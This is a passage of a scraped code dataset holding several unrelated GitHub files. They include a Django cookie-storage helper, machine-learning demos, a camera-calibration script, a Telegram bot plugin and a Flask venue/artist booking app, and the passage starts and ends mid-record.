cookie=cookie, create_time=date_time_now, update_time=date_time_now,\n is_active=True\n )\n return True, \"新增成功\"\n except Exception as e:\n logger.error(f\"add_account_cookie() meet error: {e}\")\n return False, \"操作数据库出错\"\n\n\ndef del_account_cookie(ids: list):\n try:\n count = AccountCookie.objects.filter(is_active=True, id__in=ids).update(is_active=False)\n return True, count\n except Exception as e:\n logger.error(f\"del_account_cookie() meet error: {e}\")\n return False, \"操作数据库出错\"\n","repo_name":"panmeibing/baiduwp_python","sub_path":"baiduwp_python/baiduwp_python/apps/account/utils/account_orm.py","file_name":"account_orm.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"26595667739","text":"#################################\n# ---- Made By Skult78911 ---- ## \n# ---- All RIght Reserved ---- ##\n# ---- Writted In VS Code ---- ## \n# ---- Writted In Python3 ---- ## \n#################################\n\nimport numpy as np # Importing Numpy Libary\nimport matplotlib.pyplot as plt # # Importing Matplotlib Libary\n\nN = 5 # Number of Looks for 1st and 2nd Classes\nb = 3 # Offset Variable b\n\n# -- Modeling 1 Image -- #\nx1 = np.random.random(N) # Modeling a Random Value Along One Axis x1\nx2 = x1 + [np.random.randint(10)/10 for i in range(N)] + b # x2 Modeled as x1 And Plus Random Deviation And at the end we add the variable b\nC1 = [x1, x2] # Forming a Double List C1 From the Set of These Points (These Points x1 And x2)\n\n# -- Modeling 1 Image -- #\nx1 = np.random.random(N) # Modeling a Random Value Along One Axis x1\nx2 = x1 - [np.random.randint(10)/10 for i in range(N)] - 0.1 + b # x2 Modeled as x1 And Minus Random Deviation And at the end we add the variable b\n # And Additionally We Make Minus 0.1 So That This Point x2 Is Below Our Line\n\nC2 = [x1, x2] # Forming a Double List C2 From the Set of These Points (These Points x1 And x2)\n\nf = [0+b, 1+b] # We form a straight line under 45 degrees to see how the dividing line goes But Also Adding b Variable\n\n# -- Determine 2 Coefficients -- #\nw2 = 0.5 # Let Omega 2 Coefficient Be 0.5\nw3 = -b*w2 # After that We Automatically Calculate Omega 3 Equals Minus b to Omega 2\n\nw = np.array([-w2, w2, w3]) # Well, All Weight Coefficients Will Be What's Inside (It's -w2, w2 and w3 )\nfor i in range(N):\n x = np.array([C1[0][i], C1[1][i], 1]) # Passing All Images Through Class C1\n y = np.dot(w, x) # Calculate This Output Value y\n if y >= 0: # We look If the value of y is greater than or equal to zero, then this is class C1\n print(\"Класс C1\") # And output it to the console\n else: # Otherwise It's Class C2 \n print(\"Кла��с C2\") # And output it to the console\n\nplt.scatter(C1[0][:], C1[1][:], s=10, c='red') # Display All Points C1\nplt.scatter(C2[0][:], C2[1][:], s=10, c='blue') # Display All Points C2\nplt.plot(f) # Splitting the Program With the plot Function\nplt.grid(True) # Gridding The Box Where All Neurons\nplt.show() # Showing Window With All Neurons (Like Windows Application)","repo_name":"Skult78911/CMNN-Libary","sub_path":"Source/NN XOR/Neural Network Perseptron - Classification, XOR Task - 2.py","file_name":"Neural Network Perseptron - Classification, XOR Task - 2.py","file_ext":"py","file_size_in_byte":2330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"10176798063","text":"from flask import Flask, render_template, request, jsonify\nimport pandas as pd\nfrom joblib import load\n\napp = Flask(__name__, template_folder=\"templates\")\n\n# Modell laden\nrf = load(\"../Models/random_forest_model.joblib\")\n\n# Laden der Daten\ndf = pd.read_csv(\"../data/life_expectancy_cleaned.csv\")\n\n# Eindeutige Ländernamen extrahieren und in eine Liste konvertieren\ncountry_list = df[\"Country\"].unique().tolist()\n\n\ndef predict_life_expectancy(input_data):\n # Konvertiere das Eingabedaten-Dict in einen DataFrame\n df = pd.DataFrame(input_data, index=[0])\n # Anwenden des One-Hot-Encodings auf die Eingabedaten\n df_encoded = pd.get_dummies(df)\n\n # Liste der Features laden\n all_features = load(\"../Models/feature_list.joblib\")\n\n # Füge fehlende Spalten hinzu und fülle sie mit Nullen\n for col in all_features:\n if col not in df_encoded.columns:\n df_encoded[col] = 0\n\n # Sortiere die Spalten, um sicherzustellen, dass sie in der gleichen Reihenfolge wie in den Trainingsdaten sind\n df_encoded = df_encoded[all_features]\n\n # Entferne die Zielvariable aus den Eingabevariablen\n df_encoded = df_encoded.drop(columns=[\"Life expectancy\"])\n\n # Vorhersage durchführen\n prediction = rf.predict(df_encoded)\n prediction = prediction * 100 # Zurückkonvertieren in Jahre\n\n return prediction\n\n\n@app.route(\"/\")\ndef home():\n return render_template(\"index.html\", country_list=country_list)\n\n\ndef convert_to_float(val):\n try:\n return float(val)\n except ValueError:\n return val\n\n\n@app.route(\"/predict\", methods=[\"POST\"])\ndef predict():\n # Extrahiere die Daten aus der Anfrage\n data = request.form.to_dict()\n data = {k: [convert_to_float(v)] for k, v in data.items()}\n\n # Vorhersage durchführen\n prediction = predict_life_expectancy(data)\n\n # Verwandle die Vorhersage in JSON und gib sie zurück\n return jsonify({\"prediction\": prediction.tolist()})\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"peledin/LifeExpectancy","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"1031806878","text":"from sklearn.svm import SVC\r\nfrom matplotlib.colors import ListedColormap\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nnp.random.seed(1)\r\nxXor = np.random.randn(200, 2)\r\nyXor = np.logical_xor(xXor[:, 0] > 0, xXor[:, 1] > 0)\r\nyXor = np.where(yXor, 1, -1)\r\nplt.scatter(xXor[yXor == 1, 0], xXor[yXor == 1, 1], c='b', marker='x', label='1')\r\nplt.scatter(xXor[yXor == -1, 0], xXor[yXor == -1, 1], c='r', marker='s', label='-1')\r\nplt.xlim([-3, 3])\r\nplt.ylim([-3, 3])\r\nplt.legend(loc='best')\r\nplt.show()\r\n\r\n\r\ndef plotDecisionRegions(x, y, classifier, test_idx=None, resolution=0.02):\r\n markers = ('s', 'x', 'o', '^', 'v')\r\n colors = ('red', 'blue', 'lightgreen', 'gray', 'cyan')\r\n cmap = ListedColormap(colors[:len(np.unique(y))])\r\n\r\n x1Min, x1Max = x[:, 0].min() - 1, x[:, 0].max() + 1\r\n x2Min, x2Max = x[:, 1].min() - 1, x[:, 1].max() + 1\r\n xx1, xx2 = np.meshgrid(np.arange(x1Min, x1Max, resolution), np.arange(x2Min, x2Max, resolution))\r\n z = classifier.predict(np.array([xx1.ravel(), xx2.ravel()]).T)\r\n z = z.reshape(xx1.shape)\r\n plt.contourf(xx1, xx2, z, alpha=0.3, cmap=cmap)\r\n plt.xlim(xx1.min(), xx1.max())\r\n plt.ylim(xx2.min(), xx2.max())\r\n\r\n for idx, c1 in enumerate(np.unique(y)):\r\n plt.scatter(x=x[y == c1, 0], y=x[y == c1, 1], alpha=0.8, c=colors[idx], marker=markers[idx], label=c1,\r\n edgecolor='black')\r\n if test_idx:\r\n xTest, yTest = x[test_idx, :], y[test_idx]\r\n plt.scatter(xTest[:, 0],\r\n xTest[:, 1],\r\n c=\"black\",\r\n edgecolor='black',\r\n alpha=1.0,\r\n linewidth=1,\r\n marker='o',\r\n s=100,\r\n label='Zestaw testowy')\r\n\r\n\r\nsvm = SVC(kernel='rbf', random_state=1, gamma=0.10, C=10.0)\r\nsvm.fit(xXor, yXor)\r\nplotDecisionRegions(xXor, yXor, classifier=svm)\r\nplt.legend(loc='upper left')\r\nplt.show()\r\n","repo_name":"expresoviter/KPI_Study","sub_path":"Semester_4/Applied tasks of Machine Learning/Lab3/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"15450153011","text":"#!/usr/bin/env python\n# coding: utf-8\n#import sys\n#sys.path.append(\"../\")\n\nimport flexiblecc as fcc\nimport glob\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\nimport flexiblecc.Parametric as parcc\nimport os\nimport uuid\nimport json\nimport shutil\nfrom flexiblecc.CentralModel import BundleAdjustment\n\nfolder_out = \"TestRes\"\nrun_name = str(uuid.uuid4())\nfolder_out = os.path.join(folder_out, run_name)\nos.makedirs(folder_out, exist_ok=True)\n\nimport sys\n#sys.stdout = open(os.path.join(folder_out, \"console.txt\"), 'w')\n\ndatasetpath = \"../CalImgs/ChArUco - Sorted/Samsung Galaxy S10 Plus/WideAngle/Fold_1/*.jpg\"\n\nparas = {\n \"cm_stepsize\": 252,\n \"cm_order\": 2,\n \"ls_ftol\": 1e-8,\n \"ls_gtol\": 1e-8,\n \"datasetpath\":datasetpath,\n}\n\nprint(\"paras:\", paras)\n\nwith open(os.path.join(folder_out, \"para.json\"), \"w\", encoding='utf-8') as f:\n json.dump(paras, f, ensure_ascii=False, indent=4)\n\nshutil.copy2(os.path.realpath(__file__), os.path.join(folder_out, \"run_script.txt\"))\n\nimage_files = glob.glob(paras[\"datasetpath\"])\n\ncolor_images = [cv2.imread(f) for f in tqdm(image_files)]\ngayscale_images = [cv2.cvtColor(c_img, cv2.COLOR_BGR2GRAY) for c_img in tqdm(color_images)]\n\nimage_shape = color_images[0].shape[:2]\n\nsquaresX = 28 # [#]\nsquaresY = 19 # [#]\nsquareLength = 0.01 # [m]\nmarkerLength = 0.0075 # [m]\ndictionary = cv2.aruco.getPredefinedDictionary(cv2.aruco.DICT_4X4_1000)\n\ncalibrate_retval, cameraMatrix, distCoeffs, rvecs, tvecs, stdDeviationsIntrinsics, stdDeviationsExtrinsics, perViewErrors, charucoCorners_all, charucoIds_all, markerCorners_all, armarkerIds_all, obj_points_all, board, not_used = parcc.calibrate_camera_charuco(\n gayscale_images, squaresX, squaresY,\n squareLength, markerLength, dictionary, verbose=1)\n\nplt.figure()\nfcc.Metrics.rtvecs_illustration.draw_rtvecs(rvecs, tvecs, obj_points_all)\nplt.tight_layout()\nplt.savefig(os.path.join(folder_out, \"ParBoards.png\"))\nplt.close()\n\nimg_points_all, diff_all, angels_all, mag_all = fcc.Metrics.voronoi.projectPoints_and_cal_angles_and_mag(\n charucoCorners_all, obj_points_all, rvecs, tvecs, cameraMatrix, distCoeffs)\n\nplt.figure()\nfcc.Metrics.voronoi.plot_voronoi(img_points_all, angels_all)\nplt.savefig(os.path.join(folder_out, \"Par_Voronoi.png\"))\nplt.close()\n\n\nprint(f\"RMS: {calibrate_retval:0.4f} pixels\")\n\n\n\nba = BundleAdjustment(obj_points_all, rvecs, tvecs, charucoCorners_all, cameraMatrix, distCoeffs, image_shape,\n cm_stepsize=paras[\"cm_stepsize\"], cm_order=paras[\"cm_order\"], ls_ftol=paras[\"ls_ftol\"], ls_gtol=paras[\"ls_gtol\"])\n\ncm, res, rvecs_new, tvecs_new = ba.least_squares(folder_out)\n\nfcc.CentralModel.cm_save(cm, os.path.join(folder_out, \"cm\"))\n\n\nrmsCM, residuals_2D, estimated_points_2D, correct_points_2D = ba.calc_residuals_2D(np.array(res.x), return_points_2D=True, verbose=1)\n\nnp.save(os.path.join(folder_out, \"calc_residuals_2D.npy\"), [rmsCM, residuals_2D, estimated_points_2D, correct_points_2D])\n\nrms_vs = f\"{calibrate_retval:0.5f} VS {rmsCM:0.5f}\"\nwith open(os.path.join(folder_out, rms_vs+\".txt\"), \"w\") as f:\n f.write(rms_vs)\nprint(rms_vs)\n\nimage_points = np.concatenate(correct_points_2D)\nproject_points = np.concatenate(estimated_points_2D)\n\nimp, diff, angels, mag = fcc.Metrics.voronoi.cal_angles_and_mag(image_points, project_points)\n\nplt.figure()\nfcc.Metrics.voronoi.plot_voronoi(imp, angels)\nplt.savefig(os.path.join(folder_out, 
\"CM_Voronoi.png\"))\nplt.close()\n\n#sys.stdout.close()","repo_name":"SimonLBSoerensen/Flexible-Camera-Calibration","sub_path":"Test/bundleAdjustment.py","file_name":"bundleAdjustment.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"37"}
+{"seq_id":"26532818578","text":"def init_lst():\n return [i for i in range(0, 256)]\n\n\nclass KnotTier:\n def __init__(self):\n self.pos = 0\n self.skip = 0\n\n def tie_a_knot(self, start, length, lst):\n if length < 2:\n return\n end = (start + length - 1) % len(lst)\n lst[start], lst[end] = lst[end], lst[start]\n if length == 2:\n return\n start += 1\n start %= len(lst)\n self.tie_a_knot(start, length - 2, lst)\n\n def tie_knots(self, lst, lengths):\n for length in lengths:\n self.tie_a_knot(self.pos, length, lst)\n self.pos += length + self.skip\n self.pos %= len(lst)\n self.skip += 1\n","repo_name":"howsad/aoc2017","sub_path":"src/day10/day10_commons.py","file_name":"day10_commons.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"70278593709","text":"import collections\n\nimport pypath.share.curl as curl\nimport pypath.resources.urls as urls\n\n\ndef pazar_interactions():\n\n PazarInteraction = collections.namedtuple(\n 'PazarInteraction',\n ('tf', 'target', 'pmid'),\n )\n\n url = urls.urls['pazar']['url_rescued']\n c = curl.Curl(url, silent = False)\n data = c.result\n\n return [\n PazarInteraction(*map(x.split('\\t').__getitem__, (1, 4, 10)))\n for x in ''.join(data.values()).split('\\n')\n if len(x) > 0\n ]\n","repo_name":"saezlab/pypath","sub_path":"pypath/inputs/pazar.py","file_name":"pazar.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"37"}
+{"seq_id":"11087435685","text":"from telegram import Chat, Update, User\nfrom telegram.error import NetworkError, Forbidden\nfrom telegram.ext import CallbackContext, ChatMemberHandler\n\nfrom core.config import JoinGroups, config\nfrom core.plugin import Plugin, handler\nfrom core.services.cookies import CookiesService\nfrom core.services.players import PlayersService\nfrom core.services.users.services import UserAdminService\nfrom utils.chatmember import extract_status_change\nfrom utils.log import logger\n\n\nclass ChatMember(Plugin):\n def __init__(\n self,\n user_admin_service: UserAdminService = None,\n players_service: PlayersService = None,\n cookies_service: CookiesService = None,\n ):\n self.cookies_service = cookies_service\n self.players_service = players_service\n self.user_admin_service = user_admin_service\n\n @handler.chat_member(chat_member_types=ChatMemberHandler.MY_CHAT_MEMBER, block=False)\n async def track_chats(self, update: Update, context: CallbackContext) -> None:\n result = extract_status_change(update.my_chat_member)\n if result is None:\n return\n was_member, is_member = result\n user = update.effective_user\n chat = update.effective_chat\n if chat.type == Chat.PRIVATE:\n if not was_member and is_member:\n logger.info(\"用户 %s[%s] 启用了机器人\", user.full_name, user.id)\n elif was_member and not is_member:\n logger.info(\"用户 %s[%s] 屏蔽了机器人\", user.full_name, user.id)\n elif chat.type in [Chat.GROUP, Chat.SUPERGROUP]:\n if not was_member and is_member:\n logger.info(\"用户 %s[%s] 邀请BOT进入群 %s[%s]\", user.full_name, user.id, chat.title, chat.id)\n await self.greet(user, chat, context)\n elif was_member and not is_member:\n logger.info(\"用户 %s[%s] 从 %s[%s] 群移除Bot\", user.full_name, user.id, chat.title, chat.id)\n else:\n if not was_member and is_member:\n logger.info(\"用户 %s[%s] 邀请BOT进入频道 %s[%s]\", user.full_name, user.id, chat.title, chat.id)\n elif was_member and not is_member:\n logger.info(\"用户 %s[%s] 从 %s[%s] 频道移除Bot\", user.full_name, user.id, chat.title, chat.id)\n\n async def greet(self, user: User, chat: Chat, context: CallbackContext) -> None:\n quit_status = True\n if config.join_groups == JoinGroups.NO_ALLOW:\n try:\n if await self.user_admin_service.is_admin(user.id):\n quit_status = False\n else:\n logger.warning(\"不是管理员邀请!退出群聊\")\n except Exception as exc: # pylint: disable=W0703\n logger.error(\"获取信息出现错误\", exc_info=exc)\n elif config.join_groups == JoinGroups.ALLOW_AUTH_USER:\n try:\n if await self.cookies_service.get(user.id) is not None:\n quit_status = False\n except Exception as exc: # pylint: disable=W0703\n logger.error(\"获取信息出现错误\", exc_info=exc)\n elif config.join_groups == JoinGroups.ALLOW_USER:\n try:\n if await self.players_service.get(user.id) is not None:\n quit_status = False\n except Exception as exc: # pylint: disable=W0703\n logger.error(\"获取信息出现错误\", exc_info=exc)\n elif config.join_groups == JoinGroups.ALLOW_ALL:\n quit_status = False\n else:\n quit_status = True\n if quit_status:\n try:\n await context.bot.send_message(chat.id, \"派蒙不想进去!不是旅行者的邀请!\")\n except Forbidden as exc:\n logger.info(\"发送消息失败 %s\", exc.message)\n except NetworkError as exc:\n logger.info(\"发送消息失败 %s\", exc.message)\n except Exception as exc:\n logger.info(\"发送消息失败\", exc_info=exc)\n await context.bot.leave_chat(chat.id)\n else:\n try:\n await context.bot.send_message(chat.id, \"感谢邀请小派蒙到本群!请使用 /help 查看咱已经学会的功能。\")\n except Forbidden as exc:\n logger.info(\"发送消息失败 %s\", exc.message)\n except NetworkError as exc:\n logger.info(\"发送消息失败 %s\", exc.message)\n except 
Exception as exc:\n logger.info(\"发送消息失败\", exc_info=exc)\n","repo_name":"PaiGramTeam/PaiGram","sub_path":"plugins/system/chat_member.py","file_name":"chat_member.py","file_ext":"py","file_size_in_byte":4609,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"37"}
+{"seq_id":"20336008079","text":"from typing import Optional, Any\n\nfrom objectmodel.base import ObjectModelABC, FieldABC\n\n\n__all__ = [\n 'FieldValidationError',\n 'FieldValueRequiredError',\n 'DuplicateFieldDefinitionError'\n]\n\n\nclass FieldValidationError(AttributeError):\n \"\"\" Field validation error \"\"\"\n\n def __init__(self, instance: Optional[ObjectModelABC], field: FieldABC, value: Any, message: str):\n super().__init__(f'Invalid value {value} for field {field!r} of {instance!r}: {message}')\n\n\nclass FieldValueRequiredError(AttributeError):\n \"\"\" Field is required but not set \"\"\"\n\n def __init__(self, instance: ObjectModelABC, field: FieldABC):\n super().__init__(f'Field {field!r} of {instance!r} is not set')\n\n\nclass DuplicateFieldDefinitionError(AttributeError):\n \"\"\" A field with this name is already present in model \"\"\"\n def __init__(self, field_name: str, class_name: str):\n super().__init__(f'Duplicate field definition found during {class_name} initialization, '\n f'field: {field_name}')\n","repo_name":"bshishov/objectmodel","sub_path":"src/objectmodel/errors.py","file_name":"errors.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"74523841066","text":"#----------------------------------------------------------------------------#\n# Imports\n#----------------------------------------------------------------------------#\nimport sys\nimport json\nimport dateutil.parser\nimport babel\nfrom flask import Flask, render_template, request, Response, flash, redirect, url_for, abort\nfrom flask_migrate import Migrate\nfrom flask_moment import Moment\nfrom flask_sqlalchemy import SQLAlchemy\nimport logging\nfrom logging import Formatter, FileHandler\nfrom flask_wtf import Form\nfrom forms import *\n\n#----------------------------------------------------------------------------#\n# App Config.\n#----------------------------------------------------------------------------#\n\napp = Flask(__name__)\nmoment = Moment(app)\napp.config.from_object('config')\ndb = SQLAlchemy(app)\n\n#Instantiate a Migrate object\nmigrate = Migrate(app, db)\n\n#----------------------------------------------------------------------------#\n# Models.\n#----------------------------------------------------------------------------#\nfrom models import *\n\n\n#----------------------------------------------------------------------------#\n# Filters.\n#----------------------------------------------------------------------------#\n\ndef format_datetime(value, format='medium'):\n date = dateutil.parser.parse(value)\n if format == 'full':\n format=\"EEEE MMMM, d, y 'at' h:mma\"\n elif format == 'medium':\n format=\"EE MM, dd, y h:mma\"\n return babel.dates.format_datetime(date, format)\n\napp.jinja_env.filters['datetime'] = format_datetime\n\n#----------------------------------------------------------------------------#\n# Controllers.\n#----------------------------------------------------------------------------#\n\n@app.route('/')\ndef index():\n return render_template('pages/home.html')\n\n\n# Venues\n# ----------------------------------------------------------------\n\n@app.route('/venues')\ndef venues():\n # write a query that selects all venue\n all_venues = (\n Venue.query.with_entities(Venue.city, Venue.state)\n .group_by(Venue.city, Venue.state)\n .all()\n )\n\n data = []\n # display all venues by city/state and name only. Call 'area' per venues. -html -Done\n for area in all_venues:\n venues_in_city = (\n Venue.query.filter(Venue.city == area[0])\n .filter(Venue.state == area[1])\n .all()\n )\n data.append({\"city\": area.city, \"state\": area.state, \"venues\": venues_in_city})\n\n # removed dummy code for neatness\n\n return render_template('pages/venues.html', areas=data);\n\n# Search Venue\n# ----------------------------------------------------------------\n@app.route('/venues/search', methods=['POST'])\ndef search_venues():\n\n #write a search query using ilike() operator - Thank you Miguel Grinberg!\n search_term = request.form.get('search_term', '')\n venues = db.session.query(Venue).filter(Venue.name.ilike('%' + search_term + '%')).all()\n data = []\n\n #loop over venues and display. 
Similar to show_venue\n    for venue in venues:\n        num_upcoming_shows = 0\n        shows = db.session.query(Show).filter(Show.venue_id == venue.id)\n        for show in shows:\n            if (show.start_time > datetime.now()):\n                num_upcoming_shows += 1;\n\n        data.append({\n            \"id\": venue.id,\n            \"name\": venue.name,\n            \"num_upcoming_shows\": num_upcoming_shows\n        })\n    #use len() to count\n    response={\n        \"count\": len(venues),\n        \"data\": data\n    }\n    return render_template('pages/search_venues.html', results=response, search_term=request.form.get('search_term', ''))\n\n@app.route('/venues/<int:venue_id>')\ndef show_venue(venue_id):\n\n    #write a query that pulls all venue information by ID\n    venue = db.session.query(Venue).filter(Venue.id == venue_id).one()\n\n    list_shows = db.session.query(Show).filter(Show.venue_id == venue_id)\n    past_shows = []\n    upcoming_shows = []\n\n    # will need to do an artist query \n    for show in list_shows:\n        artist = db.session.query(Artist.name, Artist.image_link).filter(Artist.id == show.artist_id).one()\n\n        show_add = {\n            \"artist_id\": show.artist_id,\n            \"artist_name\": artist.name,\n            \"artist_image_link\": artist.image_link,\n            \"start_time\": show.start_time.strftime('%m/%d/%Y')\n        }\n\n        if (show.start_time < datetime.now()):\n            #print(past_shows, file=sys.stderr)\n            past_shows.append(show_add)\n        else:\n            print(show_add, file=sys.stderr)\n            upcoming_shows.append(show_add)\n\n    data = {\n        \"id\": venue.id,\n        \"name\": venue.name,\n        \"genres\": venue.genres,\n        \"city\": venue.city,\n        \"state\": venue.state,\n        \"phone\": venue.phone,\n        \"website\": venue.website,\n        \"facebook_link\": venue.facebook_link,\n        \"seeking_talent\": venue.seeking_talent,\n        \"seeking_description\": venue.seeking_description,\n        \"image_link\": venue.image_link,\n        \"past_shows\": past_shows,\n        \"upcoming_shows\": upcoming_shows,\n        \"past_shows_count\": len(past_shows),\n        \"upcoming_shows_count\": len(upcoming_shows),\n    }\n\n\n    return render_template('pages/show_venue.html', venue=data)\n\n# Create Venue\n# ----------------------------------------------------------------\n\n@app.route('/venues/create', methods=['GET'])\ndef create_venue_form():\n    form = VenueForm()\n    return render_template('forms/new_venue.html', form=form)\n\n@app.route('/venues/create', methods=['POST'])\ndef create_venue_submission():\n\n    response = {}\n    error = False\n    try:\n        name = request.form.get(\"name\")\n        city = request.form.get(\"city\")\n        state = request.form.get(\"state\")\n        address = request.form.get(\"address\")\n        phone = request.form.get(\"phone\")\n        image_link = request.form['image_link']\n        website = request.form.get(\"website\")\n        facebook_link = request.form.get(\"facebook_link\")\n        genres = request.form.getlist(\"genres\")\n        # Created an if statement to accept True/False (wasn't working otherwise) Validated this through Knowledge as well.\n\n        seeking_talent = True if 'seeking_talent' in request.form else False \n        seeking_description = request.form['seeking_description']\n        venue = Venue(\n            name=name,\n            city=city,\n            state=state,\n            address=address,\n            phone=phone,\n            image_link=image_link,\n            website=website,\n            genres=genres,\n            facebook_link=facebook_link,\n            seeking_talent=seeking_talent,\n            seeking_description=seeking_description\n        )\n        response[\"name\"] = venue.name\n        db.session.add(venue)\n        db.session.commit()\n    except:\n\n        error = True\n        db.session.rollback()\n        print(sys.exc_info())\n    finally:\n\n        db.session.close()\n        if error == False:\n\n            # on successful db insert, flash success\n            flash('Venue ' + request.form['name'] + ' was successfully listed!')\n
        else:\n\n        flash(\"An error occurred. Venue \" + request.form[\"name\"] + \" could not be listed.\")\n        print(sys.exc_info())\n    return render_template('pages/home.html')\n\n\n# Update Venue\n# ----------------------------------------------------------------\n@app.route('/venues/<int:venue_id>/edit', methods=['GET'])\ndef edit_venue(venue_id):\n\n    form = VenueForm()\n    # query database and filter by ID\n    venue = db.session.query(Venue).filter(Venue.id == venue_id).one()\n    \n    # populate the form with Data from DB\n    form.name.data = venue.name\n    form.city.data = venue.city\n    form.state.data = venue.state\n    form.address.data = venue.address\n    form.phone.data = venue.phone\n    form.genres.data = venue.genres\n    form.image_link.data = venue.image_link\n    form.facebook_link.data = venue.facebook_link\n    form.website.data = venue.website\n    form.seeking_talent.data = venue.seeking_talent\n    form.seeking_description.data = venue.seeking_description\n\n    return render_template('forms/edit_venue.html', form=form, venue=venue)\n\n@app.route('/venues/<int:venue_id>/edit', methods=['POST'])\ndef edit_venue_submission(venue_id):\n    form = VenueForm(request.form)\n    venue = db.session.query(Venue).filter(Venue.id == venue_id).one()\n\n    error = False\n\n    # Get updated data from form\n    name = request.form['name']\n    city = request.form['city']\n    state = request.form['state']\n    address = request.form['address']\n    phone = request.form['phone']\n    genres = request.form.getlist('genres')\n    image_link = request.form['image_link']\n    facebook_link = request.form['facebook_link']\n    website = request.form['website']\n    seeking_talent = True if 'seeking_talent' in request.form else False\n    seeking_description = request.form['seeking_description']\n\n    try:\n        # get venue by ID\n        venue = Venue.query.get(venue_id)\n\n        # store updated data in variables\n        venue.name = name\n        venue.city = city\n        venue.state = state\n        venue.address = address\n        venue.phone = phone\n        venue.genres = genres\n        venue.image_link = image_link\n        venue.facebook_link = facebook_link\n        venue.website = website\n        venue.seeking_talent = seeking_talent\n        venue.seeking_description = seeking_description\n\n        # commit changes to the DB\n        db.session.commit()\n    except:\n        error = True\n        db.session.rollback()\n        print(sys.exc_info())\n    finally:\n        db.session.close()\n\n    # Show banner\n    if error:\n        flash('An error occurred. Venue '+ name + ' could not be updated.','danger'\n        )\n    else:\n        flash('Venue '+ name + ' was successfully updated!', 'success'\n        )\n    return redirect(url_for('show_venue', venue_id=venue_id))\n\n\n# Delete Venue\n# ----------------------------------------------------------------\n@app.route('/venues/<int:venue_id>', methods=['DELETE'])\ndef delete_venue(venue_id):\n    error = False\n    try:\n        # To delete a venue, select venue by ID and db.session.delete\n        venue = Venue.query.filter(Venue.id == venue_id).first()\n        name = venue.name\n\n        db.session.delete(venue)\n        db.session.commit()\n\n    except:\n\n        error = True\n        db.session.rollback()\n        flash('An error occurred.
 Venue ' + name + ' wasn\\'t deleted.')\n    finally:\n\n        db.session.close()\n        if error:\n            flash('There was an error')\n        else:\n            # flash if successful\n            flash('Venue was successfully deleted.'\n            )\n\n    # return success\n    return render_template('pages/home.html')\n\n\n\n# Artists\n# ----------------------------------------------------------------\n@app.route('/artists')\ndef artists():\n\n    # write a query to get all artists - done\n    data = db.session.query(Artist).all()\n\n    return render_template('pages/artists.html', artists=data)\n\n@app.route('/artists/search', methods=['POST'])\ndef search_artists():\n\n    #same as venue query\n    search_term = request.form.get('search_term', '')\n    artists = db.session.query(Artist).filter(Artist.name.ilike('%' + search_term + '%')).all()\n    data = []\n\n    for artist in artists:\n        num_upcoming_shows = 0\n        shows = db.session.query(Show).filter(Show.artist_id == artist.id)\n        for show in shows:\n            if(show.start_time > datetime.now()):\n                num_upcoming_shows += 1;\n        data.append({\n            \"id\": artist.id,\n            \"name\": artist.name,\n            \"num_upcoming_shows\": num_upcoming_shows\n        })\n    response={\n        \"count\": len(artists),\n        \"data\": data\n    }\n    return render_template('pages/search_artists.html', results=response, search_term=request.form.get('search_term', ''))\n\n@app.route('/artists/<int:artist_id>')\ndef show_artist(artist_id):\n\n    # Create an artist page: 1)query all data from Artist by unique id\n    artist = db.session.query(Artist).filter(Artist.id == artist_id).one()\n\n    list_shows = db.session.query(Show).filter(Show.artist_id == artist_id)\n    past_shows = []\n    upcoming_shows = []\n\n    for show in list_shows:\n        venue = db.session.query(Venue.name, Venue.image_link).filter(Venue.id == show.venue_id).one()\n\n        show_add = {\n            \"venue_id\": show.venue_id,\n            \"venue_name\": venue.name,\n            \"venue_image_link\": venue.image_link,\n            \"start_time\": show.start_time.strftime('%m/%d/%Y')\n        }\n\n        if (show.start_time < datetime.now()):\n            #print(past_shows, file=sys.stderr)\n            past_shows.append(show_add)\n        else:\n            print(show_add, file=sys.stderr)\n            upcoming_shows.append(show_add)\n\n    data = {\n        \"id\": artist.id,\n        \"name\": artist.name,\n        \"genres\": artist.genres,\n        \"city\": artist.city,\n        \"state\": artist.state,\n        \"phone\": artist.phone,\n        \"website\": artist.website,\n        \"facebook_link\": artist.facebook_link,\n        \"seeking_venue\": artist.seeking_venue,\n        \"seeking_description\": artist.seeking_description,\n        \"image_link\": artist.image_link,\n        \"past_shows\": past_shows,\n        \"upcoming_shows\": upcoming_shows,\n        \"past_shows_count\": len(past_shows),\n        \"upcoming_shows_count\": len(upcoming_shows),\n    }\n\n    return render_template('pages/show_artist.html', artist=data)\n\n\n# Update\n# ----------------------------------------------------------------\n@app.route('/artists/<int:artist_id>/edit', methods=['GET'])\ndef edit_artist(artist_id):\n    \n    form = ArtistForm()\n    # query database and filter by ID\n    artist = db.session.query(Artist).filter(Artist.id == artist_id).one()\n    \n    # populate the form with Data from DB\n    form.name.data = artist.name\n    form.city.data = artist.city\n    form.state.data = artist.state\n    form.phone.data = artist.phone\n    form.genres.data = artist.genres\n    form.image_link.data = artist.image_link\n    form.facebook_link.data = artist.facebook_link\n    form.website.data = artist.website\n    form.seeking_venue.data = artist.seeking_venue\n    form.seeking_description.data = artist.seeking_description\n\n    return render_template('forms/edit_artist.html', form=form, artist=artist)\n\n@app.route('/artists/<int:artist_id>/edit', 
